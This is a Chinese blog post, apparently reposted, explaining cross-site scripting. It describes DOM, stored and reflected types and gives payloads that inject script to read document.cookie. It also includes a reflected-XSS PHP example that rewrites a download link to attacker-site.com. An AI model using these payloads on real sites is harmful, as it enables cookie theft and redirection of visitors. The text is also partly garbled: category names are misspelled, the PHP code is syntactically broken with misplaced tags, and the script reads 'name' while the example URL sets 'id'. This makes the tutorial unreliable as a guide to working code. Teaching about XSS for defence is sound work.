标签:
所谓XSS这个场景被触发XSS地方,在大多数情况下,攻击者被嵌入在网页中(问题)该恶意脚本(Cross site Scripting),这里的攻击始终触发浏览器端,攻击的者的目的。一般都是获取用户的Cookie(能够还原账户登录状态),导航到恶意网址,携带木马,作为肉鸡发起CC攻击。传播XSS蠕虫等。
整体分为三类:
Dom-Based(Dom式)
Stroed-Based(存储式)
Reflex-Based(反射式)
<input type="text" name="address1" value=""/><script>alert(document.cookie);</script><!--">这样就是显示一个含实用户cookie的提示框,假设输入再改改:
<input type="text" name="address1" value="" onfocus="alert(document.cookie); ">这样在onfocus事件触发后,js 代码就会被运行,当然攻击者肯定不会傻的把提示框弹出来。这里仅仅是证明能够获取到数据。hk的一般做法就是把想要的数据发到自己的另外一个站上他们的做法通常是:
<?php $name = $_GET[‘name‘]; /* 在GET 參数中获取username */ echo "Welcome $name <br>"; /* 这里网页中打印变量 */ echo "<a href="http://blog.csdn.net/l_f0rM4t3d"> Click to Download</a>"; /* 显示可重定向的链接 */ ?假设用户在URL输入:>
index.php?id=ByteWay<script>alert(‘attacked‘);</script>这样在用户链接就会生成这样html代码:
Welcome ByteWay <script>alert(‘attacked‘);</script> <br> <a href=‘http://blog.csdn.net/l_f0rM4t3d‘> Click to Download</a>
Welcome ByteWay <script> window.onload=function(){var link=document.getElementsByTagName(‘a‘); link[0].href=‘http://attacker-site.com‘; } </script> <br> <a href=‘http://blog.csdn.net/l_f0rM4t3d‘> Click to Download</a>可是由于非常快就会运行window.load的方法。这样后面的劫持的URL就发生了:
Welcome ByteWay <script> window.onload=function(){var link=document.getElementsByTagName(‘a‘); link[0].href=‘http://attacker-site.com‘; } </script> <br> <a href=‘http://attacker-site.com‘> Click to Download</a> <!-- 注意这是被劫持之后的URL -->
版权声明:本文博客原创文章,博客,未经同意,不得转载。
标签:
原文地址:http://www.cnblogs.com/lcchuguo/p/4644458.html